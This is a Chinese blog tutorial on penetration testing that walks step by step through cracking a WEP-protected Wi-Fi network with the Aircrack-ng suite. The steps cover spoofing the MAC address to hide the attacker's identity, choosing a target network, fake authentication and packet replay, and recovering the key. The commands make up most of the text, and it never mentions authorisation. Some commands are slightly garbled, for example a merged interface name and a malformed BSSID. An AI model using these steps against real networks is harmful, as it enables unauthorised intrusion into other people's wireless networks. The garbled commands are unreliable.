渗透测试之wep无线网络破解

WEP 无线网络破解
WEP(无线等效协议)于 1999 年诞生,并且是用于无线网络的最古老的安全标准。在 2003
年,WEP 被 WPA 以及之后被 WPA2 取代。由于可以使用更加安全的协议,WEP 加密很少
使用了。接下来我会使用 AirCrack 套件来破解 WEP 密码。AirCrack 套件(或 AirCrackNG)是 WEP 和 WPA 密码破解程序,它会抓取无线网络封包,分析它们,使用这些
数据来破解 WEP 密码。
 
准备使用 AirCrack 来破解WEP 加密的网络会话。
 
1. 打开终端窗口,并产生无线网络接口的列表:
airmon-ng
 
2. 在 interface 列下,选择你的接口之一。这里,使用 wlan0 。如果你的接口不同, 例如 mon0 ,请将每个提到 wlan0 的地方都换成它。
 
 
3. 下面,需要停止 wlan0 接口,并把它关闭,便于接下来修改 MAC 地址。 airmon-ng stop ifconfig wlan0 down
 
4. 下面,需要修改我们接口的 MAC 地址。由于机器的 MAC 地址会在任何网络上标识 你的存在,修改机器的标识允许隐藏真正的 MAC 地址。这里,用 00:11:22:33:44:55 。 macchanger --mac 00:11:22:33:44:55 wlan0
 
5. 现在需要重启 airmon-ng 。 airmon-ng start wlan0
 
6. 下面,会使用 airodump 来定位附近的可用无线网络。 airodump-ng wlan0
 
7. 这会出现可用无线网络的列表。一旦你找到了你想要攻击的网络,按下 Ctrl + C 来停止 搜索。选中 BSSID 列中的 MAC 地址,右击你的鼠标,并且选择复制。同时,把网络正在 发送哪个频道的信号记录下载。你会在 Channel 列中找到这个信息。这里,这个频道 是 10 。
 
8. 现在运行 airodump ,并且将所选 BSSID 的信息复制到文件中。会使用下列选项: -c 允许选择频道。这里选择 10 。 -w 允许选择文件名称。这里选择 wirelessattack 。 -bssid 允许选择我们的 BSSID 。这里,从剪贴板上粘贴 09:AC:90:AB:78 。 airodump-ng –c 10 –w wirelessattack --bssid 09:AC:90:AB:78 wlan09. 新的窗口会打开,并展示这个命令的输出。保持这个窗口开着。
 
10. 打开另一个终端窗口,为了尝试组合它们,运行 aireplay 。它拥有下列语 法: aireplay-ng -1 0 –a [BSSID] –h [our chosen MAC address] –e [ESSID] [Interface] 。 aireplay-ng -1 0 -a 09:AC:90:AB:78 –h 00:11:22:33:44:55 –e backtrack wlan0
 
11. 下面,发送一些流量给路由器,便于捕获一些数据。再次使用 aireplay ,以下 列格式: aireplay-ng -3 –b [BSSID] – h [Our chosen MAC address] [Interface] 。 aireplay-ng -3 –b 09:AC:90:AB:78 –h 00:11:22:33:44:55 wlan0
 
12. 你的屏幕会开始被流量填满。将它运行一到两分钟,直到你拥有了用来执行破解的信 息。
 
13. 最后运行 AirCrack 来破解 WEP 密码。 aircrack-ng –b 09:AC:90:AB:78 wirelessattack.cap 这就结束了。
 
          我使用了 AirCrack 套件来破解无线网络的 WEP 密码。AirCrack 是最流行 的 WEP 破解工具之一。AirCrack 通过收集 WEP 无线连接的封包来工作,之后它会通过算术 分析数据来破解 WEP 加密密码。通过启动 AirCrack 并选择我们想要的接口来开始。下 面,、修改了 MAC 地址,这允许修改互联网上的身份,之后使用 airodump 搜索可用 的无线网络来攻击。一旦找到了打算攻击的网络,使用 aireplay 来将我们的机器与 正在攻击的无线设备的 MAC 地址关联。最后收集到了一些流量,之后暴力破解生成的 CAP 文件来获得无线密码。
上一篇:WebForm.aspx 页面通过 AJAX 访问WebForm.aspx.cs类中的方法,获取数据(转)


下一篇:Python_day8_面向对象(多态、成员修饰符、类中特殊方法、对象边缘知识)、异常处理之篇